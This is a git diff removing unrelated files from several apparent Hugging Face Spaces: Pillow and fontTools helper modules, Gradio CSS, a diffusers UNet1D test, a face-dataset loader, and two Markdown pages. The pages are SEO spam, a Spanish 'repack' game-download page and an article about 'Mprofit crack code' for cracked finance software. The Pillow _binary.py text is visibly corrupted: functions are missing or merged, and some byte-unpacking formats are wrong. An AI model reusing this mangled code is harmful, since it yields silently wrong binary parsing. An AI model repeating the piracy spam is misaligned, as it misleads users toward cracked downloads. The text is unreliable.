+= HEADERSIZE + 8 * len(entries) # TOC - file_length += sum(entry["size"] for entry in entries) - fp.write(struct.pack(">i", file_length)) - - # TOC - fp.write(b"TOC ") - fp.write(struct.pack(">i", HEADERSIZE + len(entries) * HEADERSIZE)) - for entry in entries: - fp.write(entry["type"]) - fp.write(struct.pack(">i", entry["size"])) - - # Data - for entry in entries: - fp.write(entry["type"]) - fp.write(struct.pack(">i", entry["size"])) - fp.write(entry["stream"]) - - if hasattr(fp, "flush"): - fp.flush() - - -def _accept(prefix): - return prefix[:4] == MAGIC - - -Image.register_open(IcnsImageFile.format, IcnsImageFile, _accept) -Image.register_extension(IcnsImageFile.format, ".icns") - -Image.register_save(IcnsImageFile.format, _save) -Image.register_mime(IcnsImageFile.format, "image/icns") - -if __name__ == "__main__": - if len(sys.argv) < 2: - print("Syntax: python3 IcnsImagePlugin.py [file]") - sys.exit() - - with open(sys.argv[1], "rb") as fp: - imf = IcnsImageFile(fp) - for size in imf.info["sizes"]: - imf.size = size - imf.save("out-%s-%s-%s.png" % size) - with Image.open(sys.argv[1]) as im: - im.save("out.png") - if sys.platform == "windows": - os.startfile("out.png") diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py deleted file mode 100644 index a74ee9eb6f341aca9e074c0acc4b306a354175a0..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/PIL/_binary.py +++ /dev/null @@ -1,102 +0,0 @@ -# -# The Python Imaging Library. -# $Id$ -# -# Binary input/output support routines. -# -# Copyright (c) 1997-2003 by Secret Labs AB -# Copyright (c) 1995-2003 by Fredrik Lundh -# Copyright (c) 2012 by Brian Crowell -# -# See the README file for information on usage and redistribution. -# - - -"""Binary input/output support routines.""" - - -from struct import pack, unpack_from - - -def i8(c): - return c if c.__class__ is int else c[0] - - -def o8(i): - return bytes((i & 255,)) - - -# Input, le = little endian, be = big endian -def i16le(c, o=0): - """ - Converts a 2-bytes (16 bits) string to an unsigned integer. - - :param c: string containing bytes to convert - :param o: offset of bytes to convert in string - """ - return unpack_from("h", c, o)[0] - - -def i32le(c, o=0): - """ - Converts a 4-bytes (32 bits) string to an unsigned integer. - - :param c: string containing bytes to convert - :param o: offset of bytes to convert in string - """ - return unpack_from("H", c, o)[0] - - -def i32be(c, o=0): - return unpack_from(">I", c, o)[0] - - -# Output, le = little endian, be = big endian -def o16le(i): - return pack("H", i) - - -def o32be(i): - return pack(">I", i) diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py deleted file mode 100644 index f7ca1acc9b762e1ffcfefd22a399927f8369a056..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/fontTools/misc/textTools.py +++ /dev/null @@ -1,155 +0,0 @@ -"""fontTools.misc.textTools.py -- miscellaneous routines.""" - - -import ast -import string - - -# alias kept for backward compatibility -safeEval = ast.literal_eval - - -class Tag(str): - @staticmethod - def transcode(blob): - if isinstance(blob, bytes): - blob = blob.decode("latin-1") - return blob - - def __new__(self, content): - return str.__new__(self, self.transcode(content)) - - def __ne__(self, other): - return not self.__eq__(other) - - def __eq__(self, other): - return str.__eq__(self, self.transcode(other)) - - def __hash__(self): - return str.__hash__(self) - - def tobytes(self): - return self.encode("latin-1") - - -def readHex(content): - """Convert a list of hex strings to binary data.""" - return deHexStr(strjoin(chunk for chunk in content if isinstance(chunk, str))) - - -def deHexStr(hexdata): - """Convert a hex string to binary data.""" - hexdata = strjoin(hexdata.split()) - if len(hexdata) % 2: - hexdata = hexdata + "0" - data = [] - for i in range(0, len(hexdata), 2): - data.append(bytechr(int(hexdata[i : i + 2], 16))) - return bytesjoin(data) - - -def hexStr(data): - """Convert binary data to a hex string.""" - h = string.hexdigits - r = "" - for c in data: - i = byteord(c) - r = r + h[(i >> 4) & 0xF] + h[i & 0xF] - return r - - -def num2binary(l, bits=32): - items = [] - binary = "" - for i in range(bits): - if l & 0x1: - binary = "1" + binary - else: - binary = "0" + binary - l = l >> 1 - if not ((i + 1) % 8): - items.append(binary) - binary = "" - if binary: - items.append(binary) - items.reverse() - assert l in (0, -1), "number doesn't fit in number of bits" - return " ".join(items) - - -def binary2num(bin): - bin = strjoin(bin.split()) - l = 0 - for digit in bin: - l = l << 1 - if digit != "0": - l = l | 0x1 - return l - - -def caselessSort(alist): - """Return a sorted copy of a list. If there are only strings - in the list, it will not consider case. - """ - - try: - return sorted(alist, key=lambda a: (a.lower(), a)) - except TypeError: - return sorted(alist) - - -def pad(data, size): - r"""Pad byte string 'data' with null bytes until its length is a - multiple of 'size'. - - >>> len(pad(b'abcd', 4)) - 4 - >>> len(pad(b'abcde', 2)) - 6 - >>> len(pad(b'abcde', 4)) - 8 - >>> pad(b'abcdef', 4) == b'abcdef\x00\x00' - True - """ - data = tobytes(data) - if size > 1: - remainder = len(data) % size - if remainder: - data += b"\0" * (size - remainder) - return data - - -def tostr(s, encoding="ascii", errors="strict"): - if not isinstance(s, str): - return s.decode(encoding, errors) - else: - return s - - -def tobytes(s, encoding="ascii", errors="strict"): - if isinstance(s, str): - return s.encode(encoding, errors) - else: - return bytes(s) - - -def bytechr(n): - return bytes([n]) - - -def byteord(c): - return c if isinstance(c, int) else ord(c) - - -def strjoin(iterable, joiner=""): - return tostr(joiner).join(iterable) - - -def bytesjoin(iterable, joiner=b""): - return tobytes(joiner).join(tobytes(item) for item in iterable) - - -if __name__ == "__main__": - import doctest, sys - - sys.exit(doctest.testmod().failed) diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css deleted file mode 100644 index 5676fb86a728e49c066354dcb7dc77546110180d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/cdn/assets/index-31d5c487.css +++ /dev/null @@ -1 +0,0 @@ -.gradio-bokeh.svelte-14lyx1r.svelte-14lyx1r{display:flex;justify-content:center}.layout.svelte-14lyx1r.svelte-14lyx1r{display:flex;flex-direction:column;justify-content:center;align-items:center;width:var(--size-full);height:var(--size-full);color:var(--body-text-color)}.altair.svelte-14lyx1r.svelte-14lyx1r{display:flex;flex-direction:column;justify-content:center;align-items:center;width:var(--size-full);height:var(--size-full)}.caption.svelte-14lyx1r.svelte-14lyx1r{font-size:var(--text-sm)}.matplotlib.svelte-14lyx1r img.svelte-14lyx1r{object-fit:contain} diff --git a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css b/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css deleted file mode 100644 index 12b9130ef86ebcd159cf75a369b754295aca6b4d..0000000000000000000000000000000000000000 --- a/spaces/dcarpintero/nlp-summarizer-pegasus/.venv/lib/python3.9/site-packages/gradio/templates/frontend/assets/index-bc19ffad.css +++ /dev/null @@ -1 +0,0 @@ -.preview.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;inset:0;flex-direction:column;z-index:var(--layer-2);backdrop-filter:blur(8px);background:var(--background-fill-primary);height:var(--size-full)}.fixed-height.svelte-1b19cri.svelte-1b19cri{min-height:var(--size-80);max-height:55vh}@media (min-width: 1280px){.fixed-height.svelte-1b19cri.svelte-1b19cri{min-height:450px}}.preview.svelte-1b19cri img.svelte-1b19cri{width:var(--size-full);height:calc(var(--size-full) - 60px);object-fit:contain}.preview.svelte-1b19cri img.with-caption.svelte-1b19cri{height:calc(var(--size-full) - 80px)}.caption.svelte-1b19cri.svelte-1b19cri{padding:var(--size-2) var(--size-3);overflow:hidden;color:var(--block-label-text-color);font-weight:var(--weight-semibold);text-align:center;text-overflow:ellipsis;white-space:nowrap}.thumbnails.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;bottom:0;justify-content:center;align-items:center;gap:var(--spacing-lg);width:var(--size-full);height:var(--size-14);overflow-x:scroll}.thumbnail-item.svelte-1b19cri.svelte-1b19cri{--ring-color:transparent;position:relative;box-shadow:0 0 0 2px var(--ring-color),var(--shadow-drop);border:1px solid var(--border-color-primary);border-radius:var(--button-small-radius);background:var(--background-fill-secondary);aspect-ratio:var(--ratio-square);width:var(--size-full);height:var(--size-full);overflow:clip}.thumbnail-item.svelte-1b19cri.svelte-1b19cri:hover{--ring-color:var(--color-accent);filter:brightness(1.1)}.thumbnail-item.selected.svelte-1b19cri.svelte-1b19cri{--ring-color:var(--color-accent)}.thumbnail-small.svelte-1b19cri.svelte-1b19cri{flex:none;transform:scale(.9);transition:75ms;width:var(--size-9);height:var(--size-9)}.thumbnail-small.selected.svelte-1b19cri.svelte-1b19cri{--ring-color:var(--color-accent);transform:scale(1);border-color:var(--color-accent)}.thumbnail-small.svelte-1b19cri>img.svelte-1b19cri{width:var(--size-full);height:var(--size-full);overflow:hidden;object-fit:var(--object-fit)}.grid-wrap.svelte-1b19cri.svelte-1b19cri{position:relative;padding:var(--size-2);height:var(--size-full);overflow-y:scroll}.grid-container.svelte-1b19cri.svelte-1b19cri{display:grid;position:relative;grid-template-rows:repeat(var(--grid-rows),minmax(100px,1fr));grid-template-columns:repeat(var(--grid-cols),minmax(100px,1fr));grid-auto-rows:minmax(100px,1fr);gap:var(--spacing-lg)}.thumbnail-lg.svelte-1b19cri>img.svelte-1b19cri{width:var(--size-full);height:var(--size-full);overflow:hidden;object-fit:var(--object-fit)}.thumbnail-lg.svelte-1b19cri:hover .caption-label.svelte-1b19cri{opacity:.5}.caption-label.svelte-1b19cri.svelte-1b19cri{position:absolute;right:var(--block-label-margin);bottom:var(--block-label-margin);z-index:var(--layer-1);border-top:1px solid var(--border-color-primary);border-left:1px solid var(--border-color-primary);border-radius:var(--block-label-radius);background:var(--background-fill-secondary);padding:var(--block-label-padding);max-width:80%;overflow:hidden;font-size:var(--block-label-text-size);text-align:left;text-overflow:ellipsis;white-space:nowrap}.icon-button.svelte-1b19cri.svelte-1b19cri{position:absolute;top:0;right:0;z-index:var(--layer-1)}.icon-buttons.svelte-1b19cri.svelte-1b19cri{display:flex;position:absolute;right:0}.icon-buttons.svelte-1b19cri a.svelte-1b19cri{margin:var(--size-1) 0} diff --git a/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py b/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py deleted file mode 100644 index b814f5f88a302c7c0bdc869ab7674c5657eee775..0000000000000000000000000000000000000000 --- a/spaces/declare-lab/tango/diffusers/tests/models/test_models_unet_1d.py +++ /dev/null @@ -1,284 +0,0 @@ -# coding=utf-8 -# Copyright 2023 HuggingFace Inc. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. - -import unittest - -import torch - -from diffusers import UNet1DModel -from diffusers.utils import floats_tensor, slow, torch_device - -from ..test_modeling_common import ModelTesterMixin - - -torch.backends.cuda.matmul.allow_tf32 = False - - -class UNet1DModelTests(ModelTesterMixin, unittest.TestCase): - model_class = UNet1DModel - - @property - def dummy_input(self): - batch_size = 4 - num_features = 14 - seq_len = 16 - - noise = floats_tensor((batch_size, num_features, seq_len)).to(torch_device) - time_step = torch.tensor([10] * batch_size).to(torch_device) - - return {"sample": noise, "timestep": time_step} - - @property - def input_shape(self): - return (4, 14, 16) - - @property - def output_shape(self): - return (4, 14, 16) - - def test_ema_training(self): - pass - - def test_training(self): - pass - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_determinism(self): - super().test_determinism() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_outputs_equivalence(self): - super().test_outputs_equivalence() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained(self): - super().test_from_save_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained_variant(self): - super().test_from_save_pretrained_variant() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_model_from_pretrained(self): - super().test_model_from_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output(self): - super().test_output() - - def prepare_init_args_and_inputs_for_common(self): - init_dict = { - "block_out_channels": (32, 64, 128, 256), - "in_channels": 14, - "out_channels": 14, - "time_embedding_type": "positional", - "use_timestep_embedding": True, - "flip_sin_to_cos": False, - "freq_shift": 1.0, - "out_block_type": "OutConv1DBlock", - "mid_block_type": "MidResTemporalBlock1D", - "down_block_types": ("DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D"), - "up_block_types": ("UpResnetBlock1D", "UpResnetBlock1D", "UpResnetBlock1D"), - "act_fn": "mish", - } - inputs_dict = self.dummy_input - return init_dict, inputs_dict - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_pretrained_hub(self): - model, loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="unet" - ) - self.assertIsNotNone(model) - self.assertEqual(len(loading_info["missing_keys"]), 0) - - model.to(torch_device) - image = model(**self.dummy_input) - - assert image is not None, "Make sure output is not None" - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output_pretrained(self): - model = UNet1DModel.from_pretrained("bglick13/hopper-medium-v2-value-function-hor32", subfolder="unet") - torch.manual_seed(0) - if torch.cuda.is_available(): - torch.cuda.manual_seed_all(0) - - num_features = model.in_channels - seq_len = 16 - noise = torch.randn((1, seq_len, num_features)).permute( - 0, 2, 1 - ) # match original, we can update values and remove - time_step = torch.full((num_features,), 0) - - with torch.no_grad(): - output = model(noise, time_step).sample.permute(0, 2, 1) - - output_slice = output[0, -3:, -3:].flatten() - # fmt: off - expected_output_slice = torch.tensor([-2.137172, 1.1426016, 0.3688687, -0.766922, 0.7303146, 0.11038864, -0.4760633, 0.13270172, 0.02591348]) - # fmt: on - self.assertTrue(torch.allclose(output_slice, expected_output_slice, rtol=1e-3)) - - def test_forward_with_norm_groups(self): - # Not implemented yet for this UNet - pass - - @slow - def test_unet_1d_maestro(self): - model_id = "harmonai/maestro-150k" - model = UNet1DModel.from_pretrained(model_id, subfolder="unet") - model.to(torch_device) - - sample_size = 65536 - noise = torch.sin(torch.arange(sample_size)[None, None, :].repeat(1, 2, 1)).to(torch_device) - timestep = torch.tensor([1]).to(torch_device) - - with torch.no_grad(): - output = model(noise, timestep).sample - - output_sum = output.abs().sum() - output_max = output.abs().max() - - assert (output_sum - 224.0896).abs() < 4e-2 - assert (output_max - 0.0607).abs() < 4e-4 - - -class UNetRLModelTests(ModelTesterMixin, unittest.TestCase): - model_class = UNet1DModel - - @property - def dummy_input(self): - batch_size = 4 - num_features = 14 - seq_len = 16 - - noise = floats_tensor((batch_size, num_features, seq_len)).to(torch_device) - time_step = torch.tensor([10] * batch_size).to(torch_device) - - return {"sample": noise, "timestep": time_step} - - @property - def input_shape(self): - return (4, 14, 16) - - @property - def output_shape(self): - return (4, 14, 1) - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_determinism(self): - super().test_determinism() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_outputs_equivalence(self): - super().test_outputs_equivalence() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained(self): - super().test_from_save_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_save_pretrained_variant(self): - super().test_from_save_pretrained_variant() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_model_from_pretrained(self): - super().test_model_from_pretrained() - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output(self): - # UNetRL is a value-function is different output shape - init_dict, inputs_dict = self.prepare_init_args_and_inputs_for_common() - model = self.model_class(**init_dict) - model.to(torch_device) - model.eval() - - with torch.no_grad(): - output = model(**inputs_dict) - - if isinstance(output, dict): - output = output.sample - - self.assertIsNotNone(output) - expected_shape = torch.Size((inputs_dict["sample"].shape[0], 1)) - self.assertEqual(output.shape, expected_shape, "Input and output shapes do not match") - - def test_ema_training(self): - pass - - def test_training(self): - pass - - def prepare_init_args_and_inputs_for_common(self): - init_dict = { - "in_channels": 14, - "out_channels": 14, - "down_block_types": ["DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D", "DownResnetBlock1D"], - "up_block_types": [], - "out_block_type": "ValueFunction", - "mid_block_type": "ValueFunctionMidBlock1D", - "block_out_channels": [32, 64, 128, 256], - "layers_per_block": 1, - "downsample_each_block": True, - "use_timestep_embedding": True, - "freq_shift": 1.0, - "flip_sin_to_cos": False, - "time_embedding_type": "positional", - "act_fn": "mish", - } - inputs_dict = self.dummy_input - return init_dict, inputs_dict - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_from_pretrained_hub(self): - value_function, vf_loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="value_function" - ) - self.assertIsNotNone(value_function) - self.assertEqual(len(vf_loading_info["missing_keys"]), 0) - - value_function.to(torch_device) - image = value_function(**self.dummy_input) - - assert image is not None, "Make sure output is not None" - - @unittest.skipIf(torch_device == "mps", "mish op not supported in MPS") - def test_output_pretrained(self): - value_function, vf_loading_info = UNet1DModel.from_pretrained( - "bglick13/hopper-medium-v2-value-function-hor32", output_loading_info=True, subfolder="value_function" - ) - torch.manual_seed(0) - if torch.cuda.is_available(): - torch.cuda.manual_seed_all(0) - - num_features = value_function.in_channels - seq_len = 14 - noise = torch.randn((1, seq_len, num_features)).permute( - 0, 2, 1 - ) # match original, we can update values and remove - time_step = torch.full((num_features,), 0) - - with torch.no_grad(): - output = value_function(noise, time_step).sample - - # fmt: off - expected_output_slice = torch.tensor([165.25] * seq_len) - # fmt: on - self.assertTrue(torch.allclose(output, expected_output_slice, rtol=1e-3)) - - def test_forward_with_norm_groups(self): - # Not implemented yet for this UNet - pass diff --git a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py b/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py deleted file mode 100644 index 96bbb8bb6da99122f350bc8e1a6390245840e32b..0000000000000000000000000000000000000000 --- a/spaces/deepskyreal/ai-mixer-hotchpotch/sad_talker/src/face3d/models/arcface_torch/dataset.py +++ /dev/null @@ -1,124 +0,0 @@ -import numbers -import os -import queue as Queue -import threading - -import mxnet as mx -import numpy as np -import torch -from torch.utils.data import DataLoader, Dataset -from torchvision import transforms - - -class BackgroundGenerator(threading.Thread): - def __init__(self, generator, local_rank, max_prefetch=6): - super(BackgroundGenerator, self).__init__() - self.queue = Queue.Queue(max_prefetch) - self.generator = generator - self.local_rank = local_rank - self.daemon = True - self.start() - - def run(self): - torch.cuda.set_device(self.local_rank) - for item in self.generator: - self.queue.put(item) - self.queue.put(None) - - def next(self): - next_item = self.queue.get() - if next_item is None: - raise StopIteration - return next_item - - def __next__(self): - return self.next() - - def __iter__(self): - return self - - -class DataLoaderX(DataLoader): - - def __init__(self, local_rank, **kwargs): - super(DataLoaderX, self).__init__(**kwargs) - self.stream = torch.cuda.Stream(local_rank) - self.local_rank = local_rank - - def __iter__(self): - self.iter = super(DataLoaderX, self).__iter__() - self.iter = BackgroundGenerator(self.iter, self.local_rank) - self.preload() - return self - - def preload(self): - self.batch = next(self.iter, None) - if self.batch is None: - return None - with torch.cuda.stream(self.stream): - for k in range(len(self.batch)): - self.batch[k] = self.batch[k].to(device=self.local_rank, non_blocking=True) - - def __next__(self): - torch.cuda.current_stream().wait_stream(self.stream) - batch = self.batch - if batch is None: - raise StopIteration - self.preload() - return batch - - -class MXFaceDataset(Dataset): - def __init__(self, root_dir, local_rank): - super(MXFaceDataset, self).__init__() - self.transform = transforms.Compose( - [transforms.ToPILImage(), - transforms.RandomHorizontalFlip(), - transforms.ToTensor(), - transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]), - ]) - self.root_dir = root_dir - self.local_rank = local_rank - path_imgrec = os.path.join(root_dir, 'train.rec') - path_imgidx = os.path.join(root_dir, 'train.idx') - self.imgrec = mx.recordio.MXIndexedRecordIO(path_imgidx, path_imgrec, 'r') - s = self.imgrec.read_idx(0) - header, _ = mx.recordio.unpack(s) - if header.flag > 0: - self.header0 = (int(header.label[0]), int(header.label[1])) - self.imgidx = np.array(range(1, int(header.label[0]))) - else: - self.imgidx = np.array(list(self.imgrec.keys)) - - def __getitem__(self, index): - idx = self.imgidx[index] - s = self.imgrec.read_idx(idx) - header, img = mx.recordio.unpack(s) - label = header.label - if not isinstance(label, numbers.Number): - label = label[0] - label = torch.tensor(label, dtype=torch.long) - sample = mx.image.imdecode(img).asnumpy() - if self.transform is not None: - sample = self.transform(sample) - return sample, label - - def __len__(self): - return len(self.imgidx) - - -class SyntheticDataset(Dataset): - def __init__(self, local_rank): - super(SyntheticDataset, self).__init__() - img = np.random.randint(0, 255, size=(112, 112, 3), dtype=np.int32) - img = np.transpose(img, (2, 0, 1)) - img = torch.from_numpy(img).squeeze(0).float() - img = ((img / 255) - 0.5) / 0.5 - self.img = img - self.label = 1 - - def __getitem__(self, index): - return self.img, self.label - - def __len__(self): - return 1000000 diff --git a/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md b/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md deleted file mode 100644 index 10eb55ec016c846319b0d95f33bce8d1d1569c81..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC [REPACK].md +++ /dev/null @@ -1,37 +0,0 @@ - -

    Descarga Last Year The Nightmare C V17.01.19 para PC: el juego de terror multijugador que te hará temblar

    - -

    ¿Te gustan los juegos de terror? ¿Te atreves a enfrentarte a un asesino despiadado mientras intentas escapar con tus amigos? Si la respuesta es sí, entonces tienes que descargar Last Year The Nightmare C V17.01.19 para PC, la última versión del juego de terror multijugador que te hará temblar de miedo.

    -

    DESCARGA LAST YEAR THE NIGHTMARE C V17.01.19 PARA PC


    DOWNLOAD 🆗 https://gohhs.com/2uFVdH



    - -

    Last Year The Nightmare es un juego de terror cooperativo en el que cinco jugadores asumen el papel de supervivientes que deben escapar de un escenario plagado de trampas y peligros. Pero no estarán solos, ya que otro jugador controlará a uno de los cuatro asesinos disponibles, cada uno con sus propias habilidades y armas. El asesino podrá cambiar de forma, colocar trampas, sabotear objetos y usar el entorno a su favor para cazar y eliminar a los supervivientes.

    - -

    El juego cuenta con varios modos de juego, como el modo Pesadilla, en el que los supervivientes solo tienen una vida y el asesino puede revivir infinitamente; o el modo Escapada, en el que los supervivientes deben completar una serie de objetivos para abrir la salida y escapar antes de que se acabe el tiempo. Además, el juego ofrece una gran variedad de escenarios, como un instituto abandonado, un hospital psiquiátrico o un campamento en el bosque.

    - -

    Para descargar Last Year The Nightmare C V17.01.19 para PC, solo tienes que seguir estos pasos:

    - -
      -
    1. Visita la página oficial del juego en Steam y haz clic en el botón "Añadir al carrito".
    2. -
    3. Inicia sesión con tu cuenta de Steam o crea una nueva si no la tienes.
    4. -
    5. Realiza el pago con el método que prefieras y espera a que se complete la descarga.
    6. -
    7. Una vez descargado el juego, ábrelo desde tu biblioteca de Steam y disfruta de la experiencia más terrorífica.
    8. -
    - -

    No esperes más y descarga Last Year The Nightmare C V17.01.19 para PC, el juego de terror multijugador que te hará temblar. ¿Serás capaz de sobrevivir o caerás en las garras del asesino?

    - -

    Si quieres saber más sobre Last Year The Nightmare C V17.01.19 para PC, aquí te dejamos algunas de sus características más destacadas:

    -

    - -
      -
    • Un juego de terror multijugador asimétrico en el que cinco supervivientes deben escapar de un asesino que los persigue.
    • -
    • Cuatro asesinos diferentes para elegir, cada uno con su propio estilo de juego y habilidades especiales.
    • -
    • Varios modos de juego y escenarios para disfrutar de una experiencia variada y desafiante.
    • -
    • Un sistema de progresión y personalización que te permite desbloquear nuevos objetos, habilidades y aspectos para los personajes.
    • -
    • Un apartado gráfico y sonoro que te sumerge en una atmósfera de terror y tensión.
    • -
    - -

    Last Year The Nightmare C V17.01.19 para PC es un juego que no te puedes perder si eres fanático de los juegos de terror y quieres vivir una experiencia única con tus amigos. El juego te pondrá a prueba tanto como superviviente como asesino, y tendrás que usar tu ingenio, tu cooperación y tu instinto para salir victorioso o morir en el intento.

    - -

    ¿A qué esperas? Descarga Last Year The Nightmare C V17.01.19 para PC hoy mismo y prepárate para sentir el verdadero terror.

    d5da3c52bf
    -
    -
    \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md b/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md deleted file mode 100644 index 9dc72720cd22e501c1d903ec4951b99d9af96522..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Mprofit Crack Code For Windows [2021].md +++ /dev/null @@ -1,28 +0,0 @@ - -

    Mprofit Crack Code For Windows: A Review

    -

    If you are looking for a software that can help you manage your portfolio, track your investments, and file your taxes, you might have heard of Mprofit. Mprofit is a popular portfolio management software that offers a range of features and benefits for investors and advisors. But what if you don't want to pay for the full version of Mprofit? Is there a way to get Mprofit crack code for Windows and enjoy all the benefits of the software for free?

    -

    In this article, we will review Mprofit crack code for Windows and see if it is worth downloading and installing. We will also compare it with the original Mprofit software and see what are the pros and cons of using Mprofit crack code for Windows.

    -

    Mprofit Crack Code For Windows


    Download Zip ✶✶✶ https://gohhs.com/2uFTVX



    -

    What is Mprofit?

    -

    Mprofit is a portfolio management software that allows you to manage your investments, assets, liabilities, income, expenses, and taxes in one place. It supports various asset classes, such as stocks, mutual funds, bonds, fixed deposits, gold, real estate, and more. It also integrates with various online platforms, such as stock exchanges, mutual fund houses, banks, and brokers, to import your data automatically and keep it updated.

    -

    Mprofit also helps you generate various reports and statements, such as capital gains, profit and loss, balance sheet, cash flow, asset allocation, and more. You can also export your data to Excel or PDF formats or email it directly from the software. Mprofit also helps you file your taxes by calculating your tax liability and generating tax reports.

    -

    Mprofit is available in two versions: Mprofit Pro and Mprofit Advisor. Mprofit Pro is designed for individual investors who want to manage their own portfolio. Mprofit Advisor is designed for professional advisors who want to manage multiple portfolios for their clients. Both versions have different pricing plans depending on the number of portfolios and features you need.

    -

    What is Mprofit Crack Code For Windows?

    -

    Mprofit crack code for Windows is a modified version of Mprofit software that bypasses the license verification and allows you to use the software for free. It is usually downloaded from third-party websites that claim to offer Mprofit crack code for Windows along with a download link and instructions on how to install it.

    -

    Mprofit crack code for Windows may seem like a tempting option for those who want to save money and enjoy all the features of Mprofit without paying for it. However, there are many risks and drawbacks associated with using Mprofit crack code for Windows that you should be aware of before downloading it.

    -

    What are the Risks and Drawbacks of Using Mprofit Crack Code For Windows?

    -

    Here are some of the risks and drawbacks of using Mprofit crack code for Windows:

    -
      -
    • It may not work properly: Mprofit crack code for Windows may not be compatible with your system or may have bugs or errors that affect its performance. It may also not have all the features or updates of the original Mprofit software or may have some features disabled or corrupted. You may not be able to import your data correctly or generate accurate reports or statements using Mprofit crack code for Windows.
    • -
    • It may harm your system: Mprofit crack code for Windows may contain viruses, malware, spyware, or other harmful programs that can infect your system and compromise its security. These programs may steal your personal or financial information, damage your files or data, slow down your system, or cause other problems. You may also expose yourself to legal issues or penalties if you use pirated software.
    • -
    • It may not be supported: Mprofit crack code for Windows may not have any customer support or technical assistance from the official Mprofit team. If you encounter any problems or issues with the software, you may not be able to get any help or solutions from them. You may also not be able to access any online resources or tutorials that are available for the original Mprofit software.
    • -
    • It may not be ethical: Mprofit crack code for Windows may violate the intellectual property rights of the original Mprofit developers. By using pirated software, you are not respecting their hard work and creativity and depriving them of their rightful income. You are also contributing to the problem of software piracy that affects the software industry and economy.
    • -
    -

    Conclusion

    -

    Mprofit crack code for Windows may seem like a good idea at first glance, but it is not worth the risk or hassle. It may not work properly, harm your system, lack support, or be unethical. Instead of using Mprofit crack code for Windows, you should consider buying the original Mprofit software from their official website. You can choose from different pricing plans that suit your budget and needs. You can also enjoy a free trial period before buying the software to test its features and functionality.

    -

    Mprofit is a reliable and reputable portfolio management software that can help you manage your investments and taxes efficiently and effectively. It has many features and benefits that make it worth paying for. By buying the original Mprofit software, you can support the developers, get regular updates and support, and ensure your system's security and performance.

    -

    -

    Conclusion

    -

    Mprofit crack code for Windows is a risky and unethical option that you should avoid. It may not work properly, harm your system, lack support, or violate the intellectual property rights of the original Mprofit developers. Instead, you should buy the original Mprofit software from their official website and enjoy its features and benefits. Mprofit is a reliable and reputable portfolio management software that can help you manage your investments and taxes efficiently and effectively.

    3cee63e6c2
    -
    -
